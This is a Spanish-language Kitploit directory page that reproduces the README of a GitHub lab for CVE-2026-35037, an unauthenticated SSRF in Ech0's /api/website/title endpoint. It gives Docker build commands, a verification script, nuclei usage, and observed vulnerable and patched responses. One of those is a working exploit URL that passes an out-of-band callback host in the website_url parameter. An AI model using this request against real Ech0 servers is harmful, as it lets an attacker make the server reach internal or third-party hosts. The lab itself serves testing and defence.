Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
POC_CVE-2026-35037 — Laboratorio de reproducción aislado local para CVE-2026-35037, una vulnerabilidad SSRF no autenticada en el endpoint GET /api/website/title de Ech0. Incluye configuración de Docker Compose, script de verificación y plantilla de nuclei para validación. | Kitploit
Herramientas/GitHubGitHub/fineman999/poc_cve-2026-35037
Análisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubfineman999/poc_cve-2026-35037

POC_CVE-2026-35037

Laboratorio de reproducción aislado local para CVE-2026-35037, una vulnerabilidad SSRF no autenticada en el endpoint GET /api/website/title de Ech0. Incluye configuración de Docker Compose, script de verificación y plantilla de nuclei para validación.

Ver Repositorio
2hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Laboratorio SSRF CVE-2026-35037 Ech0

Este repositorio contiene un laboratorio de reproducción local y aislado para CVE-2026-35037, una vulnerabilidad SSRF no autenticada en el endpoint GET /api/website/title de Ech0.

El laboratorio utiliza un servidor de evidencia local controlado en lugar de metadatos en la nube o infraestructura de terceros.

Resumen

  • Producto: lin-snow/Ech0
  • Vulnerabilidad: Falsificación de solicitudes del lado del servidor
  • CVE: CVE-2026-35037
  • GHSA: GHSA-cqgf-f4x7-g6wc
  • Versiones afectadas: GHSA lista <= 4.2.1; NVD describe versiones anteriores a 4.2.8
  • Versión parcheada: 4.2.8
  • Endpoint: GET /api/website/title
  • Parámetro: website_url
  • Autenticación: no requerida en la versión vulnerable

Referencias:

  • https://nvd.nist.gov/vuln/detail/CVE-2026-35037
  • https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc

Archivos

  • docker-compose.yml: inicia Ech0 y un servidor HTTP de evidencia local
  • Dockerfile.ech0-lab: construye Ech0 desde la etiqueta oficial de GitHub
  • verify-cve-2026-35037.sh: envía la solicitud de verificación SSRF controlada
  • evidence/index.html: página HTML controlada con un <title> único
  • nuclei/CVE-2026-35037.yaml: plantilla candidata de nuclei

¿Por qué compilar desde el código fuente?

Las etiquetas históricas vulnerables de Docker como sn0wl1n/ech0:4.2.1 no estaban disponibles cuando se creó este laboratorio. En su lugar, el laboratorio compila desde las etiquetas oficiales de GitHub lin-snow/Ech0:

  • v4.2.1 para el candidato vulnerable
  • v4.2.8 para la comparación parcheada

El Dockerfile local también evita problemas de compilación ascendentes observados con el histórico build.Dockerfile.

Requisitos

  • Docker Engine o Docker Desktop
  • curl
  • Opcional: nuclei

Ejecuta esto solo en un laboratorio local aislado. No uses estos comandos contra sistemas de terceros. Úsalos solo contra sistemas que poseas o para los que tengas autorización escrita explícita para realizar pruebas.

Reproducir el comportamiento vulnerable

Inicia Ech0 v4.2.1:

ECH0_TAG=4.2.1 docker compose up -d --build

Envía la solicitud de verificación controlada:

sh verify-cve-2026-35037.sh

Respuesta vulnerable esperada:

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8

{"code":1,"msg":"获取网站标题成功","data":"ECH0-SSRF-CVE-2026-35037"}

Confirma que Ech0 llegó al servidor de evidencia controlado:

docker compose logs evidence

Registro de evidencia observado:

ech0-cve-2026-35037-evidence  | 192.168.107.3 - - [20/May/2026 03:48:51] "GET / HTTP/1.1" 200 -

Comparar la versión parcheada

Inicia Ech0 v4.2.8:

docker compose down -v
ECH0_TAG=4.2.8 docker compose up -d --build

Ejecuta la misma solicitud:

sh verify-cve-2026-35037.sh

Respuesta parcheada observada:

HTTP/1.1 401 Unauthorized
Content-Type: application/json; charset=utf-8

{"code":0,"msg":"未找到令牌,请点击右上角登录","error_code":"TOKEN_MISSING","message_key":"auth.token_missing","data":null}

Validación con Nuclei

Valida la plantilla:

nuclei -validate -t nuclei/CVE-2026-35037.yaml

Ejecuta contra la versión vulnerable v4.2.1:

nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277

Resultado vulnerable observado:

[INF] Using Interactsh Server: oast.online
[CVE-2026-35037] [http] [high] http://127.0.0.1:6277/api/website/title?website_url=http://d86j283ea0u4jbaqj8dgo4cgc4jhn7r3f.oast.online/
[INF] Scan completed in 6.425886625s. 1 matches found.

Ejecuta contra la versión parcheada v4.2.8:

nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277

Resultado parcheado observado:

[INF] Using Interactsh Server: oast.fun
[INF] Scan completed in 5.974574416s. No results found.

Limpieza

docker compose down -v

Notas

  • El laboratorio manual usa http://evidence:8080/ dentro de la red de Docker Compose.
  • La plantilla de nuclei usa {{interactsh-url}} y requiere soporte OAST/interactsh.
  • La plantilla de nuclei usa {{interactsh-url}}, que contacta por defecto con los servidores interactsh de ProjectDiscovery como oast.online o oast.fun. Usa -iserver para sobrescribir el servidor o -ni para deshabilitar interactsh.
  • El laboratorio no sondea endpoints de metadatos en la nube.
  • El laboratorio no contacta con objetivos de producción o de terceros, excepto las descargas normales de dependencias/imágenes durante la compilación de Docker.
Descargar herramienta